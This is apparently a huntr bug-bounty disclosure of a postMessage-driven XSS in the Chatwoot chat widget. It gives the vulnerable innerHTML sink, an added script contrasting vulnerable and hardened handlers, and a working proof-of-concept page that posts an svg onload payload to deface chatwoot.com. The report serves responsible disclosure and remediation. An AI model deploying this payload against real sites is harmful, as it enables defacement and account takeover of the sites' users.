huntr | Renwax23 | FD5999FD-B1FD-44B4-AE2E-8F95B5C3D1B6
History: Feb 02, 2023 - 10:18 p.m.

XSS via postMessage to deface any website and account takeover

www.huntr.dev
Tags: xss, postmessage, chatwoot, website defacement, account takeover, automation, vulnerability discovery, proof of concept

EPSS: 0.001 (percentile 43.7%)

Description

Hey Chatwoot team, while looking for vulnerabilities I found a critical XSS which allows us to XSS/deface any website that uses the chat; this can be automated to attack thousands of websites.

Vulnerable Code

Inside this function https://github.com/chatwoot/chatwoot/blob/30fcb47477481772c9a447f7406af3a72be26ed1/app/javascript/sdk/bubbleHelpers.js#L16

We have this code:

export const setBubbleText = bubbleText => {
  if (isExpandedView(window.$chatwoot.type)) {
    const textNode = document.getElementById('woot-widget--expanded__text');
    textNode.innerHTML = bubbleText;
  }
};

The code assigns bubbleText to innerHTML, a dangerous sink: the browser parses the string as markup and runs any event handler it contains. The problem is that we control the value of this variable, because it is taken from a message received by the widget's postMessage handler, so any page that can obtain a reference to the widget window (the PoC below uses window.open) can set it.
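To make the source-to-sink path concrete, here is an added example (not Chatwoot's code) of a widget-side message handler modelled on the behaviour described above, first in the vulnerable shape (no origin check, innerHTML sink) and then hardened (origin allowlist, strict message shape, textContent sink). The "chatwoot-widget:" prefix and the setBubbleLabel event/label fields are taken from the PoC message; the handler structure, the origins, and the fake DOM node used so that it runs under Node are assumptions for illustration.

```javascript
// Added example, not Chatwoot's code: a widget-side postMessage handler
// modelled on the behaviour the report describes, first with the innerHTML
// sink and no origin check, then hardened. The "chatwoot-widget:" prefix and
// the "setBubbleLabel" event/label fields are taken from the PoC message; the
// handler structure, origins and the fake DOM node are assumptions.

const MESSAGE_PREFIX = 'chatwoot-widget:';

// Label taken from the PoC. The &quot; entities stay literal text here, exactly
// as they travel inside the JSON; only an HTML attribute parser turns them into
// the double quotes the inner JavaScript needs.
const POC_LABEL =
  "<svg><svg/onload='document.body.innerHTML=&quot;<br><br>" +
  "<h1 style=color:red;font-size:99px>pwned&quot;'>";
const POC_MESSAGE = MESSAGE_PREFIX + JSON.stringify({ event: 'setBubbleLabel', label: POC_LABEL });

// Stand-in for a DOM element so this runs under Node. A real innerHTML setter
// parses markup and fires event handlers; this one only records that markup
// would have been parsed. textContent never parses, so it stays a plain string.
function fakeTextNode() {
  const node = { html: '', textContent: '', parsedMarkup: false };
  Object.defineProperty(node, 'innerHTML', {
    get() { return node.html; },
    set(value) {
      node.html = String(value);
      node.parsedMarkup = /<[a-z!\/]/i.test(node.html);
    },
  });
  return node;
}

// Accept only "chatwoot-widget:<json object>"; anything else yields null.
function parseWidgetMessage(data) {
  if (typeof data !== 'string' || !data.startsWith(MESSAGE_PREFIX)) return null;
  try {
    const parsed = JSON.parse(data.slice(MESSAGE_PREFIX.length));
    return parsed !== null && typeof parsed === 'object' && !Array.isArray(parsed) ? parsed : null;
  } catch (e) {
    return null;
  }
}

// Vulnerable sink, as in bubbleHelpers.js: the attacker-controlled label is parsed as HTML.
function setBubbleTextVulnerable(textNode, label) {
  textNode.innerHTML = label;
}

// Hardened sink: textContent renders the label verbatim, so "<svg onload=...>"
// is displayed as text and never executed.
function setBubbleTextSafe(textNode, label) {
  textNode.textContent = label;
}

// Build a message handler. allowedOrigins === null means "no origin check",
// which is the vulnerable configuration; otherwise only listed origins are honoured.
function makeHandler(textNode, allowedOrigins, setter) {
  return (event) => {
    if (allowedOrigins !== null && !allowedOrigins.includes(event.origin)) return 'rejected-origin';
    const msg = parseWidgetMessage(event.data);
    if (msg === null || msg.event !== 'setBubbleLabel' || typeof msg.label !== 'string') return 'ignored';
    setter(textNode, msg.label);
    return 'applied';
  };
}

// Run the PoC message against both handlers and report what each did.
function runScenarios() {
  const hostOrigin = 'https://shop.example';         // assumed site embedding the widget
  const attackerOrigin = 'https://attacker.example'; // assumed page running the PoC
  const evil = { origin: attackerOrigin, data: POC_MESSAGE };

  const vulnNode = fakeTextNode();
  const vulnerable = makeHandler(vulnNode, null, setBubbleTextVulnerable);
  const vulnResult = vulnerable(evil);

  const safeNode = fakeTextNode();
  const hardened = makeHandler(safeNode, [hostOrigin], setBubbleTextSafe);
  const crossSiteResult = hardened(evil);
  const sameSiteResult = hardened({ origin: hostOrigin, data: POC_MESSAGE });
  const malformedResult = hardened({ origin: hostOrigin, data: MESSAGE_PREFIX + '{not json' });

  return {
    vulnResult,
    vulnParsedMarkup: vulnNode.parsedMarkup,
    crossSiteResult,
    sameSiteResult,
    safeText: safeNode.textContent,
    safeParsedMarkup: safeNode.parsedMarkup,
    malformedResult,
  };
}

console.log(runScenarios());
```

Two points worth separating: the origin check stops the cross-window delivery shown in the PoC, but which origin to allow depends on the deployment (the widget has to accept messages from whatever site embeds it, so the fixed allowlist here is only a placeholder), and it does nothing if the host page itself is attacker-influenced. The sink change is what removes the XSS: with textContent, the label from the PoC is shown as literal text and the svg onload handler never runs.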

Proof of Concept

<body onclick=x()><h1>Click here</h1>
<script>
// A click is needed because window.open requires a user gesture. The target
// page is opened in a named window, the widget is given time to load, and a
// setBubbleLabel message is posted with target origin '*'.
var w;
function x(){
  w=window.open('https://www.chatwoot.com/','w');
  setTimeout(()=>{
    // The literal &quot; entities survive JSON parsing untouched and are only
    // decoded when the browser parses the onload attribute, which yields the
    // double quotes the inner JavaScript needs.
    w.postMessage(`chatwoot-widget:{"event":"setBubbleLabel","label":"<svg><svg/onload='document.body.innerHTML=&quot;<br><br><h1 style=color:red;font-size:99px>pwned&quot;'>"}`,'*')
  },5000)
}
</script>

Online POC

https://pwr.wtf/chatw.html


Thanks
Renwa

